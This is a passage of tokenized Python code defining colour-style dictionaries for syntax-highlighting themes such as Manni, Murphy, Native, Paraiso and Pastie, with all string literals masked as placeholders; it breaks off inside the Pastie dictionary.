{ <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> MANNI_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> MURPHY_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> NATIVE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PARAISO_DARK_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PARAISO_LIGHT_STYLE = { <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PASTIE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 